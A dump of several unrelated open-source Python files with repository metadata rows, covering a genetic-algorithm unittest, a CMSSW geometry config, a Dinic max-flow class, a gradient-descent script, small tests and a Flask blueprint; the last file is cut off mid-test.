self.assertNotEqual(id(self.newpopW[i]),
id(self.rankedWeights[j]),
'individual %d\'s weights are a view of ranked' % i +
'weights %d' % j)
for io in range(len(self.newpopW[i])):
self.assertNotEqual(id(self.newpopW[i][io]),
id(self.rankedWeights[j][io]),
'individual %d\'s %d weights are a view '
% (i, io) + 'of ranked weights %d' % j)
def testElitism(self):
# The top eliteN individuals must carry over with identical weights
# (element-wise difference of zero).
for i in range(NN.eliteN):
for io in range(2):
shouldBeZeros = self.rankedWeights[i][io] - self.newpopW[i][io]
self.assertFalse(shouldBeZeros.any())
def testLengthOfNewPop(self):
self.assertEqual(len(self.newpopW), NN.pop_size)
def testShapeOfNewPop(self):
# Overall array shape and every per-individual matrix shape must be
# preserved by evolution.
oldshape = array(self.rankedWeights).shape
newshape = array(self.newpopW).shape
self.assertEqual(oldshape, newshape)
for i in range(len(self.pop)):
for io in range(len(self.rankedWeights[i])):
assert io <= 1
self.assertEqual(
array(self.rankedWeights[i][io]).shape,
array(self.newpopW[i][io]).shape)
class testselectTwoIndividuals(unittest.TestCase):
def setUp(self):
self.pop = createPop()
self.pairedPop = pairPop(self.pop)
self.rankedPop = sorted(self.pairedPop, key=itemgetter(-1), reverse=True)
self.rankedWeights = [x[0] for x in self.rankedPop]
self.fitnessScores = [x[-1] for x in self.rankedPop]
self.ch1, self.ch2 = selectTwoIndividuals(self.fitnessScores, self.rankedWeights)
def testChromosomesAreNotShallowCopies(self):
# The two selected chromosomes must be independent objects, not
# references into the ranked weights (identity check at both levels).
for i in range(len(self.rankedWeights)):
self.assertNotEqual(
id(self.ch1),
id(self.rankedWeights[i]))
self.assertNotEqual(
id(self.ch2),
id(self.rankedWeights[i]))
for io in range(len(self.rankedWeights[i])):
assert io <= 1
self.assertNotEqual(
id(self.ch1[io]),
id(self.rankedWeights[i][io]))
self.assertNotEqual(
id(self.ch2[io]),
id(self.rankedWeights[i][io]))
if __name__ == '__main__':
unittest.main()
"dalberto.adler@gmail.com"
] | dalberto.adler@gmail.com |
06cb9f6621d634240e8d8059be5f33b447dbb0d2 | 7887a24a4c0eed525a044b785e950d9a71ea7558 | /SimG4Core/PrintGeomInfo/test/python/runDDD2026_cfg.py | ab8ed29b51b7e934ab9a57aa86d12a95a6ee501a | [
"Apache-2.0"
] | permissive | CMS-HGCAL/cmssw | 1aba653346d5a6a69aa60629b7b0cf81880cef91 | 03230166537ea0ea9e0c975cf28964ee81d545ae | refs/heads/hgcal-condformat-HGCalNANO-13_2_0_pre2 | 2023-08-16T21:25:36.872190 | 2023-08-14T20:05:05 | 2023-08-15T23:28:48 | 62,036,013 | 2 | 2 | Apache-2.0 | 2023-09-12T13:02:50 | 2016-06-27T07:48:31 | C++ | UTF-8 | Python | false | false | 3,674 | py | ###############################################################################
# Way to use this:
# cmsRun runDDD2026_cfg.py geometry=D88
#
# Options for geometry D86, D88, D91, D92, D93, D94, D95, D96, D97, D98, D99
#
###############################################################################
import FWCore.ParameterSet.Config as cms
import os, sys, imp, re
import FWCore.ParameterSet.VarParsing as VarParsing
####################################################################
### SETUP OPTIONS
options = VarParsing.VarParsing('standard')
options.register('geometry',
"D92",
VarParsing.VarParsing.multiplicity.singleton,
VarParsing.VarParsing.varType.string,
"geometry of operations: D86, D88, D91, D92, D93, D94, D95, D96, D97, D98, D99")
### get and parse the command line arguments
options.parseArguments()
print(options)
####################################################################
# Use the options
# D94 uses a different Phase-2 era than the other geometries.
if (options.geometry == "D94"):
from Configuration.Eras.Era_Phase2C20I13M9_cff import Phase2C20I13M9
process = cms.Process('G4PrintGeometry',Phase2C20I13M9)
else:
from Configuration.Eras.Era_Phase2C17I13M9_cff import Phase2C17I13M9
process = cms.Process('G4PrintGeometry',Phase2C17I13M9)
# Derive the geometry config module and the per-geometry output file names.
geomFile = "Configuration.Geometry.GeometryExtended2026" + options.geometry + "Reco_cff"
materialFileName = "matfile" + options.geometry + "DDD.txt"
solidFileName = "solidfile" + options.geometry + "DDD.txt"
lvFileName = "lvfile" + options.geometry + "DDD.txt"
pvFileName = "pvfile" + options.geometry + "DDD.txt"
touchFileName = "touchfile" + options.geometry + "DDD.txt"
regionFileName = "regionfile" + options.geometry + "DDD.txt"
print("Geometry file Name: ", geomFile)
print("Material file Name: ", materialFileName)
print("Solid file Name: ", solidFileName)
print("LV file Name: ", lvFileName)
print("PV file Name: ", pvFileName)
print("Touch file Name: ", touchFileName)
print("Region file Name: ", regionFileName)
process.load(geomFile)
process.load('FWCore.MessageService.MessageLogger_cfi')
from SimG4Core.PrintGeomInfo.g4PrintGeomInfo_cfi import *
process = printGeomInfo(process)
if hasattr(process,'MessageLogger'):
process.MessageLogger.G4cerr=dict()
process.MessageLogger.G4cout=dict()
# Configure the PrintGeomInfoAction watcher: only the summary and the solid
# dump are enabled; everything else is switched off.
process.g4SimHits.Watchers = cms.VPSet(cms.PSet(
DumpSummary = cms.untracked.bool(True),
DumpLVTree = cms.untracked.bool(False),
DumpMaterial = cms.untracked.bool(False),
DumpLVList = cms.untracked.bool(False),
DumpLV = cms.untracked.bool(False),
DumpSolid = cms.untracked.bool(True),
DumpAttributes = cms.untracked.bool(False),
DumpPV = cms.untracked.bool(False),
DumpRotation = cms.untracked.bool(False),
DumpReplica = cms.untracked.bool(False),
DumpTouch = cms.untracked.bool(False),
DumpSense = cms.untracked.bool(False),
DumpRegion = cms.untracked.bool(False),
DD4hep = cms.untracked.bool(False),
Name = cms.untracked.string(''),
Names = cms.untracked.vstring(''),
MaterialFileName = cms.untracked.string(materialFileName),
SolidFileName = cms.untracked.string(solidFileName),
LVFileName = cms.untracked.string(lvFileName),
PVFileName = cms.untracked.string(pvFileName),
TouchFileName = cms.untracked.string(touchFileName),
RegionFileName = cms.untracked.string(regionFileName),
FileDetail = cms.untracked.bool(True),
type = cms.string('PrintGeomInfoAction')
))
| [
"sunanda.banerjee@cern.ch"
] | sunanda.banerjee@cern.ch |
694642cedfed44db0b0286b0ec4dbb6e4b50e77a | 29b58edf26d0e4a965ea758c1f0e6ae51a61d3ed | /Loops/1loops.py | dfc631f39038bed104ec937e38d0060f11e1f85e | [] | no_license | namntran/modern_python3_bootcamp | bfe0fc8b647329f44ad4228d7a12480b9f3821cd | 6b273112b4bd324b95d0dc148c46f605c792c167 | refs/heads/master | 2020-06-16T20:27:41.891467 | 2020-02-16T04:53:16 | 2020-02-16T04:53:16 | 195,694,593 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 529 | py | # i = 1
# while i < 5:
# i += i #increment i by 1
# print(i)
# print 1 to 5
# i = 0
# while i <= 5:
# i += 1
# print(i)
# from random import randint # use randint(a, b) to generate a random number between a and b
from random import randint

# Keep rolling a random integer in [1, 10] until a 5 comes up, printing every
# roll; `i` counts how many rolls it took.
i = 0
while True:
    i += 1
    number = randint(1, 10)
    print(number)
    if number == 5:
        break
"namtran78@gmail.com"
] | namtran78@gmail.com |
2ce0d6b47e327d9dac0dc05d12e07d920f9cbc62 | 94df1d5cd401bd035e36cb96d2ceacd09b223ac0 | /python_library/graph/dinic.py | 256fdc946c39601eaced238f0e62a3606df045f8 | [
"MIT"
] | permissive | knuu/contest_library | 3b7dce152041009c37caf11a483f9e79e74052ad | 0d3bff34df965d00e1e4a0f2e4fbe8e822810fd5 | refs/heads/master | 2022-11-09T20:44:33.430736 | 2022-11-05T16:22:21 | 2022-11-05T16:22:21 | 180,644,772 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,090 | py | import collections
class MaxFlow:
"""Calculate max flow by Dinic's algorithm
complexity: O(EV^2)
used in GRL6A(AOJ)
"""
class Edge:
"""edge in flow networks"""
# `rev` is the index of the reverse edge in E[to], so residual
# capacity can be updated in O(1).
def __init__(self, to, cap, rev):
self.to, self.cap, self.rev = to, cap, rev
def __init__(self, V):
""" V: the number of vertexes
E: adjacency list
source: start point
sink: goal point
"""
self.V = V
self.E = [[] for _ in range(V)]
def add_edge(self, fr, to, cap):
# Add the forward edge and its zero-capacity reverse edge, each
# storing the other's index.
self.E[fr].append(self.Edge(to, cap, len(self.E[to])))
self.E[to].append(self.Edge(fr, 0, len(self.E[fr]) - 1))
def run(self, source, sink, INF=10 ** 9):
"""find max-flow"""
# Repeat: build a level graph with BFS, then push blocking flows with
# DFS until no augmenting path remains in this level graph.
maxflow = 0
while True:
self.bfs(source)
if self.level[sink] < 0:
return maxflow
# `itr` remembers, per vertex, which edges are already exhausted.
self.itr = [0] * self.V
while True:
flow = self.dfs(source, sink, INF)
if flow > 0:
maxflow += flow
else:
break
def dfs(self, vertex, sink, flow):
"""find augmenting path"""
# Only follow edges that go one level deeper (level graph constraint).
if vertex == sink:
return flow
for i in range(self.itr[vertex], len(self.E[vertex])):
self.itr[vertex] = i
e = self.E[vertex][i]
if e.cap > 0 and self.level[vertex] < self.level[e.to]:
d = self.dfs(e.to, sink, min(flow, e.cap))
if d > 0:
# Push d units forward and add them to the reverse edge.
e.cap -= d
self.E[e.to][e.rev].cap += d
return d
return 0
def bfs(self, start):
"""find shortest path from start"""
# level[v] = BFS distance from start in the residual graph, -1 if
# unreachable.
que = collections.deque()
self.level = [-1] * self.V
que.append(start)
self.level[start] = 0
while que:
fr = que.popleft()
for e in self.E[fr]:
if e.cap > 0 and self.level[e.to] < 0:
self.level[e.to] = self.level[fr] + 1
que.append(e.to)
| [
"premier3next@gmail.com"
] | premier3next@gmail.com |
b5f06531dbe3c04664346f6cfd8fbd90c85fa5b5 | 9adc810b07f7172a7d0341f0b38088b4f5829cf4 | /tests/test_continuous_memory_augmented.py | 5eb4373d630b344ea3e657bd6e5768e045be776a | [
"MIT"
] | permissive | Asap7772/railrl_evalsawyer | 7ee9358b5277b9ddf2468f0c6d28beb92a5a0879 | baba8ce634d32a48c7dfe4dc03b123e18e96e0a3 | refs/heads/main | 2023-05-29T10:00:50.126508 | 2021-06-18T03:08:12 | 2021-06-18T03:08:12 | 375,810,557 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 978 | py | import unittest
import numpy as np
from rlkit.envs.memory.continuous_memory_augmented import (
ContinuousMemoryAugmented,
)
from rlkit.envs.memory.one_char_memory import OneCharMemory
from rlkit.testing.np_test_case import NPTestCase
class TestContinuousMemoryAugmented(NPTestCase):
def test_dim_correct(self):
# 6-dim wrapped env action (n=5 one-hot + stop?) plus 10 memory states
# gives a flat action dim of 16 — presumably; verify against the env.
ocm = OneCharMemory(n=5, num_steps=100)
env = ContinuousMemoryAugmented(ocm, num_memory_states=10)
self.assertEqual(env.action_space.flat_dim, 16)
def test_memory_action_saved(self):
# The memory half of the action must be returned unchanged as the
# saved memory in the next observation.
ocm = OneCharMemory(n=5, num_steps=100)
env = ContinuousMemoryAugmented(ocm, num_memory_states=10)
env.reset()
env_action = np.zeros(6)
env_action[0] = 1
memory_written = np.random.rand(10)
action = [env_action, memory_written]
_, saved_memory = env.step(action)[0]
self.assertNpArraysEqual(memory_written, saved_memory)
if __name__ == '__main__':
unittest.main()
| [
"alexanderkhazatsky@gmail.com"
] | alexanderkhazatsky@gmail.com |
e721b0da6badeaacbd866a2f0a8a7aaba7ede2c4 | 773300eda3f26141a8cbf8259688c15978e5fdff | /collect_data/collect_emb_AE.py | 8e26b6ed01d859faeec1ac580d59e392170302bb | [] | no_license | ver228/worm-ts-classification | 96601c0f579a4d8f110cb6307ff59f8eb7620657 | 6d4d6b6f04e05a93baea7a5a7550a7a180b60c94 | refs/heads/master | 2021-10-28T15:28:27.098510 | 2019-04-24T07:36:35 | 2019-04-24T07:36:35 | 179,681,345 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,077 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue May 15 13:04:37 2018
@author: avelinojaver
"""
from pathlib import Path
import sys
src_d = Path(__file__).resolve().parents[1]
sys.path.append(str(src_d))
from worm_ts_classification.path import _root_dirs
from embeddings_helper import calculate_embeddings
from collect_emb_CeNDR import get_video_info_from_files
import pandas as pd
import os
def get_video_info_from_csv_agg(root_dir):
    """Load the aggregation-screening metadata CSV, drop unusable strains,
    and return (filtered metadata DataFrame, list of existing feature files).
    """
    metadata_csv = Path.home() / 'workspace/WormData/screenings/Serena_WT_Screening/metadata_aggregation_screening.csv'
    video_info = pd.read_csv(str(metadata_csv))
    # Strip the archive mount prefix so directories are relative to root_dir.
    video_info['dirname'] = video_info['dirname'].str.replace('/Volumes/behavgenom_archive\$/Serena/AggregationScreening/MaskedVideos/', '')
    video_info = video_info.rename(columns={'strain_name': 'strain', 'dirname': 'file_path'})
    # 'NONE' marks videos without a usable strain label.
    video_info = video_info[~video_info['strain'].isin(['NONE'])]
    fnames = root_dir + '/' + video_info['file_path'] + '/' + video_info['basename'].str.replace('.hdf5', '_featuresN.hdf5')
    # Keep only the rows whose features file actually exists on disk.
    exists_mask = [os.path.exists(fname) for fname in fnames.values]
    video_info = video_info[exists_mask]
    fnames = [Path(fname) for fname, ok in zip(fnames.values, exists_mask) if ok]
    return video_info, fnames
#%%
if __name__ == '__main__':
p = 'osx' if sys.platform == 'darwin' else 'centos_oxford'
root = _root_dirs[p]
set_type = 'CeNDR'
emb_set = 'AE2DWithSkels32_emb32_20180620'
root_dir = root + 'experiments/autoencoders/embeddings/CeNDR_ROIs_embeddings/20180620_173601_AE2DWithSkels32_skel-1-1_adam_lr0.001_batch16'
video_info, fnames = get_video_info_from_files(root_dir, f_ext = '_embeddings.hdf5')
save_file = root + 'experiments/classify_strains/{}_{}.hdf5'.format(set_type, emb_set)
calculate_embeddings(video_info,
fnames,
emb_set,
save_file,
col_label = 'roi_index',
embeddings_field = '/embeddings')
| [
"ver228@gmail.com"
] | ver228@gmail.com |
042d8b627f884b675c421f5924b25125dbd9ba28 | 344e44fd1caa2976daa11429bf57a949e6b824de | /lesson4/Win_Entry.py | 51ebb606d841eb9531eb9097072c1f528a2afdec | [] | no_license | vincenttuan/ntnu_python | 621bc23c6b7443fde9d9975f6a98226ddec3c42a | e1361518ab69bf8064d38efccb743fcc9b4dd4b5 | refs/heads/master | 2020-12-15T06:23:27.338319 | 2020-02-05T07:37:09 | 2020-02-05T07:37:09 | 234,856,476 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 683 | py | import random
import tkinter
from tkinter import messagebox
def get():
    """Show the current Entry text in an info message box."""
    messagebox.showinfo("Hello Python", entry.get())
def set():
    """Replace the Entry text with a random integer in [1, 100].

    NOTE(review): shadows the builtin `set`; it is wired to button2 below,
    so renaming would break that reference.
    """
    entry.delete(0, tkinter.END)
    entry.insert(0, str(random.randint(1, 100)))
win = tkinter.Tk()
entry = tkinter.Entry(win, justify=tkinter.CENTER)
entry.config(font=('Arial', 40))
entry.insert(0, "hello")
entry.insert("end", "world")
entry.insert(5, ", ")
entry.pack()
button1 = tkinter.Button(win, text="Get", command=get)
button1.config(font=('Arial', 30))
button1.pack(side=tkinter.LEFT)
button2 = tkinter.Button(win, text="Set", command=set)
button2.config(font=('Arial', 30))
button2.pack(side=tkinter.RIGHT)
win.mainloop()
| [
"vincentjava@yahoo.com.tw"
] | vincentjava@yahoo.com.tw |
3e58c1bd8bb2ce83eff77c6b6415588b37ace5ee | 161dcb4b1f3939231728e91a8129a2571842d23a | /unit_12/mysite/page/views.py | b717f1ce9a72e4c7c54642a51138da7f81962296 | [] | no_license | bm1120836/21-python | 3162896e1b9e41d57c4249ea5f3bcaf06eef0361 | 8924f9b53e68b08f9203f48b215ea5b3a420d075 | refs/heads/master | 2023-05-03T16:11:42.864607 | 2015-10-01T13:26:29 | 2015-10-01T13:26:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 284 | py | from django.shortcuts import render
# Create your views here.
def index(request):
    """Render the site landing page with an empty template context."""
    context = {}
    return render(request, 'pages/index.html', context)
def about(request):
mydict = {'title': 'Over and over I keep going over the world we knew'}
return render(request,'pages/about.html', mydict) | [
"janusnic@gmail.com"
] | janusnic@gmail.com |
2702973ff7a17bed0d48b32a62ace7da4711edf1 | 5f957add3e3f7a1885d4f1b106de72e93c8fcb1a | /ExerciciosPython/ex104.py | 3553a22823ba1a045866075009e6c26bace8337e | [
"MIT"
] | permissive | mpatrickaires/curso-python | 6e32cf785a3bc0076bb3ea24cd6d896604f4e774 | aba023648527d53bfe18833b91210a7e528a84d7 | refs/heads/main | 2022-12-27T00:57:07.467940 | 2020-10-14T00:48:09 | 2020-10-14T00:48:09 | 302,203,176 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 317 | py | def leiaInt(msg):
num = str(input(msg))
while not num.strip('-').isnumeric():
print('\033[1;31mERRO! Digite um número válido.\033[m')
num = input(msg)
num = int(num)
return num
# Programa Principal
n = leiaInt('Digite um número: ')
print(f'Você acabou de digitar o número {n}')
| [
"mpatrickaires@gmail.com"
] | mpatrickaires@gmail.com |
2064b14b6a814eb78b1b5e02c449821f5678c3f3 | ee8c4c954b7c1711899b6d2527bdb12b5c79c9be | /assessment2/amazon/run/core/controllers/adamant.py | 1fae335b579f8f57ee4132e01c1630fe476896ba | [] | no_license | sqlconsult/byte | 02ac9899aebea4475614969b594bfe2992ffe29a | 548f6cb5038e927b54adca29caf02c981fdcecfc | refs/heads/master | 2021-01-25T14:45:42.120220 | 2018-08-11T23:45:31 | 2018-08-11T23:45:31 | 117,135,069 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 368 | py | #!/usr/bin/env python3
from flask import Blueprint, Flask, render_template, request, url_for
controller = Blueprint('adamant', __name__, url_prefix='/adamant')
# @controller.route('/<string:title>', methods=['GET'])
# def lookup(title):
# if title == 'Republic': # TODO 2
# return render_template('republic.html') # TODO 2
# else:
# pass
| [
"sqlconsult@hotmail.com"
] | sqlconsult@hotmail.com |
e9f664051e1cd44334bed76437d2bc6d1b9406fb | f07a42f652f46106dee4749277d41c302e2b7406 | /Data Set/bug-fixing-1/2c58ac18335d9ccde20b181d76eafa8246a3add2-<get_dict_of_struct>-bug.py | c1b04ce9a26065e77e20d7fb780cf6950f112efa | [] | no_license | wsgan001/PyFPattern | e0fe06341cc5d51b3ad0fe29b84098d140ed54d1 | cc347e32745f99c0cd95e79a18ddacc4574d7faa | refs/heads/main | 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,532 | py |
def get_dict_of_struct(connection, vm):
    """Transform an oVirt SDK Vm struct into a plain Python dictionary.

    Returns an empty dict when vm is None; otherwise issues extra SDK
    service calls to collect the VM's devices, tags, statistics, affinity
    labels and affinity groups, and flattens everything into one dict.
    """
    if (vm is None):
        return dict()
    # Per-VM sub-services used to fetch the related collections.
    vms_service = connection.system_service().vms_service()
    clusters_service = connection.system_service().clusters_service()
    vm_service = vms_service.vm_service(vm.id)
    devices = vm_service.reported_devices_service().list()
    tags = vm_service.tags_service().list()
    stats = vm_service.statistics_service().list()
    labels = vm_service.affinity_labels_service().list()
    groups = clusters_service.cluster_service(vm.cluster.id).affinity_groups_service().list()
    return {
        'id': vm.id,
        'name': vm.name,
        # host may be unset (e.g. VM not running), hence the guard.
        'host': (connection.follow_link(vm.host).name if vm.host else None),
        'cluster': connection.follow_link(vm.cluster).name,
        'status': str(vm.status),
        'description': vm.description,
        'fqdn': vm.fqdn,
        'os_type': vm.os.type,
        'template': connection.follow_link(vm.template).name,
        'tags': [tag.name for tag in tags],
        'affinity_labels': [label.name for label in labels],
        # NOTE(review): the inner comprehension rebinds `vm` in its own scope;
        # the left-hand `vm.name` is the outer VM. Works, but easy to misread.
        'affinity_groups': [group.name for group in groups if (vm.name in [vm.name for vm in connection.follow_link(group.vms)])],
        'statistics': dict(((stat.name, stat.values[0].datum) for stat in stats)),
        'devices': dict(((device.name, [ip.address for ip in device.ips]) for device in devices)),
        # NOTE(review): assumes devices[0].ips is non-empty when devices exist —
        # confirm against the SDK; an IP-less device would raise here.
        'ansible_host': (devices[0].ips[0].address if (len(devices) > 0) else None),
    }
| [
"dg1732004@smail.nju.edu.cn"
] | dg1732004@smail.nju.edu.cn |
ed6013412f56c3d8d36b040db1926b7dbe4df1ac | 48a647031af30b93b332001544b258a787542c6f | /venv/chapter_14/class_3.py | 2436a321ca8a0127db83bc6d111881405f3e1be4 | [] | no_license | Adminsys-debug/xdclass_python | 3d3f37f7812336aa79bf9dc0d990658c67156057 | c2e82b750c5337045b07c19a0c9ead5c3752b3a7 | refs/heads/master | 2022-05-20T07:10:33.396655 | 2020-04-18T05:40:48 | 2020-04-18T05:40:48 | 256,659,175 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 667 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2020/3/31 15:34
# @Author : mr.chen
# @File : class_3
# @Software: PyCharm
# @Email : 794281961@qq.com
# 多态特性和构造函数
class Person:
    """Demo class for constructors and instance methods (course exercise)."""

    # Constructor
    def __init__(self, name, age, height):
        # Runtime message ("this is an initialization operation") kept as-is.
        print("这是一个初始化操作")
        self.name = name
        self.age = age
        self.height = height

    def introduce_self(self):
        """Print a one-line self introduction with name, age and height."""
        print("hello,my name is %s and my age is %d and i.m %d height" % (self.name, self.age, self.height))
person = Person("Admin_sys", 27, 172)
person2 = Person("Admin_sys", 28, 173)
person.introduce_self()
person2.introduce_self()
| [
"a794281961@126.com"
] | a794281961@126.com |
6dfc0b14ac75334fd342c8fa9823d30c170f81a5 | 30ab9750e6ca334941934d1727c85ad59e6b9c8a | /zentral/contrib/santa/api_urls.py | 93f78fcb7f41f3f7a75739e197ec40139f839f52 | [
"Apache-2.0"
] | permissive | ankurvaishley/zentral | 57e7961db65278a0e614975e484927f0391eeadd | a54769f18305c3fc71bae678ed823524aaa8bb06 | refs/heads/main | 2023-05-31T02:56:40.309854 | 2021-07-01T07:51:31 | 2021-07-01T14:15:34 | 382,346,360 | 1 | 0 | Apache-2.0 | 2021-07-02T12:55:47 | 2021-07-02T12:55:47 | null | UTF-8 | Python | false | false | 404 | py | from django.conf.urls import url
from rest_framework.urlpatterns import format_suffix_patterns
from .api_views import IngestFileInfo, RuleSetUpdate
app_name = "santa_api"
urlpatterns = [
url('^ingest/fileinfo/$', IngestFileInfo.as_view(), name="ingest_file_info"),
url('^rulesets/update/$', RuleSetUpdate.as_view(), name="ruleset_update"),
]
urlpatterns = format_suffix_patterns(urlpatterns)
| [
"eric.falconnier@112hz.com"
] | eric.falconnier@112hz.com |
d55042888f85b776d9c53eb7f35d5f535bf6f671 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_74/268.py | e90272ff021d33b8a2ee2f63dff93259a4e40e74 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 766 | py | def f(l):
begin={'O':1,'B':1}
last=l[0][0]
lasttime=0
result=0
for k in l:
robot=k[0]
if robot==last:
lasttime+=1+abs(k[1]-begin[robot])
result+=1+abs(k[1]-begin[robot])
begin[robot]=k[1]
else:
temp=abs(k[1]-begin[robot])
temp=max(temp,lasttime)
lasttime=1+temp-lasttime
result+=lasttime
begin[robot]=k[1]
last=robot
return result
def main():
    """Read T cases from stdin (count line, then one line per case) and solve each.

    Each case line is: k followed by k (robot, button) pairs.
    NOTE(review): the list comprehension's `i` shadows the loop `i`, but in
    Python 3 the comprehension has its own scope, so `i+1` below is the case number.
    """
    s=input()
    T=int(s)
    for i in range(T):
        s=input()
        s=s.split(' ')
        k=int(s[0])
        s=s[1:]
        l=[(s[2*i],int(s[2*i+1])) for i in range(k)]
        print('Case #{0}: {1}'.format(i+1,f(l)))
main()
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
51f28b71ea08ed3bbd585cf7d38c3bdd57d362b4 | f6f4c87a1f2e750530a7d691da43514d84f99f5c | /hw12/a/q3.py | 6a3fdd0a408784e1ef313b123ef255e9c6c38d7a | [] | no_license | sarthak77/Basics-of-ML-AI | e941c6653bca95278cc62ee7ba229e8eaf4e309b | cb2ba9d271da919846211cf8496e29aff6beaa46 | refs/heads/master | 2020-07-25T10:33:54.420972 | 2020-01-09T19:25:57 | 2020-01-09T19:25:57 | 208,257,383 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,108 | py | import numpy as np
import matplotlib.pyplot as plt
def read_data(filename):
    """Load tab-separated numeric rows from *filename* and scale each of the
    first six columns by its column mean.

    Returns a list of 6-element lists (features plus target, mean-normalized).
    """
    with open(filename, "r") as handle:
        data = [np.array(line.split("\t")).astype('float64') for line in handle]
    mean = np.mean(data, axis=0)
    # Divide every entry by its column mean so each column averages to 1.
    return [[row[i] / mean[i] for i in range(6)] for row in data]
def MSE_Gradient(w, data):
    """Gradient of the mean-squared-error loss of the linear model w.

    Each row of *data* holds 5 features plus the target in column 5; the
    target slot is replaced by a bias term of 1 when forming the input
    vector (matching MSE_Loss). The constant factor 2 is folded into the
    learning rate, as in the original.

    Fixes three defects of the original implementation:
    - `y = data[5]` read the sixth *row* instead of row i's label;
    - the gradient was overwritten each iteration instead of accumulated;
    - `x[5] = 1` mutated the caller's rows, destroying the stored labels.
    """
    neg_grad = np.zeros(6)
    for row in data:
        y = row[5]                          # read the label before the bias overwrite
        x = np.array(row, dtype='float64')  # copy: leave the caller's row intact
        x[5] = 1                            # bias term
        neg_grad += (np.dot(w, x) - y) * x
    # Average so the scale matches MSE_Loss's division by len(data).
    return neg_grad / len(data)
def MSE_Loss(w, data):
    """Mean squared error of the linear model w over *data*.

    Each row holds 5 features plus the target in column 5; the target slot
    becomes the bias term 1 in the input vector.

    Fixes the original aliasing bug: `x = data[i]; x[5] = 1` overwrote the
    row in place before `y = data[i][5]` was read, so y was always 1 and
    the dataset was silently corrupted.
    """
    loss = 0.0
    for row in data:
        y = row[5]                          # read the label first
        x = np.array(row, dtype='float64')  # copy: do not mutate the caller's row
        x[5] = 1                            # bias term
        loss += (np.dot(w, x) - y) ** 2
    return loss / len(data)
# Normal GDE
def Normal_GDE(data):
    """Plain gradient descent with a fixed step size.

    Prints the loss each iteration and the final weight vector; stops when
    the loss is small enough or has effectively stopped changing.
    """
    print("Normal GDE")
    step_size = 0.00005
    weights = np.zeros(6)
    previous, current = 10, MSE_Loss(weights, data)
    iteration = 0
    while previous > 1e-3 and abs(previous - current) > 1e-5:
        iteration += 1
        previous = current
        print("ITERATION = ", iteration, ", Loss = ", current)
        weights = weights - step_size * MSE_Gradient(weights, data)
        current = MSE_Loss(weights, data)
    print("FINAL W = ", weights, " AFTER ", iteration, " ITERATIONS ")
# Optimized Learning Rate GDE
def Optimized_Learning_GDE(data):
    """Gradient descent with the exact line-search step for a quadratic loss.

    Uses alpha_opt = ||g||^2 / (g^T H g) where H = sum_i x_i x_i^T is the
    Gauss-Newton Hessian of the least-squares objective.

    Fixes two defects of the original:
    - H depends only on the inputs, never on w, yet was rebuilt inside the
      descent loop every iteration; it is now computed once up front;
    - `x = data[i]; x[5] = 1` mutated the caller's rows (destroying the
      labels); the bias overwrite now happens on a copy.
    """
    print("OPTIMIZED LEARNING RATE GDE")
    iters = 0
    w = np.zeros(6)
    # Hessian of the quadratic loss: constant, so hoist it out of the loop.
    hessian = np.zeros([6, 6])
    for row in data:
        x = np.array(row, dtype='float64')  # copy: keep the label intact
        x[5] = 1                            # bias slot
        hessian += np.outer(x, x)
    prev_loss = 10
    loss = MSE_Loss(w, data)
    # Stop when loss is pretty small or doesn't change much.
    while prev_loss > 1e-3 and abs(prev_loss - loss) > 1e-5:
        iters += 1
        prev_loss = loss
        print("ITERATION = ", iters, ", Loss = ", loss)
        gradient = MSE_Gradient(w, data)
        alpha_opt = (np.linalg.norm(gradient) ** 2) / (np.dot(gradient, np.dot(hessian, gradient)))
        w = w - alpha_opt * gradient
        loss = MSE_Loss(w, data)
    print("FINAL W = ", w, "\n AFTER ", iters, " ITERATIONS AND LOSS = ", loss)
data = read_data("airfoil_self_noise.dat")
# Normal_GDE(data)
Optimized_Learning_GDE(data) | [
"sarthak.singhal@students.iiit.ac.in"
] | sarthak.singhal@students.iiit.ac.in |
16689823e89dd4a3b15cad04a6054513fc61b631 | 9cb0543499fd473a609b6cb19f0db921586f5b48 | /lingvo/core/conformer_layer_test.py | b2ded4a207307e78ff392a2aa6065a1f3785bc68 | [
"Apache-2.0"
] | permissive | Harshs27/lingvo | bbb852eb3cd69b64813268857d91571241b12a40 | bd396e651488b2e2c4a7416be077b4a0226c87c8 | refs/heads/master | 2022-12-01T05:43:24.300541 | 2020-08-11T00:16:33 | 2020-08-11T00:17:08 | 286,606,464 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,289 | py | # Lint as: python3
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for conformer layers as in https://arxiv.org/abs/2005.08100."""
# Lint as: PY3
from absl.testing import parameterized
from lingvo import compat as tf
from lingvo.core import conformer_layer
from lingvo.core import test_utils
class LConvLayerTest(test_utils.TestCase, parameterized.TestCase):
  """Smoke tests for the lightweight-convolution (LConv) layer."""

  def testBasic(self):
    """Builds an LConvLayer and checks FProp runs on all-zero inputs."""
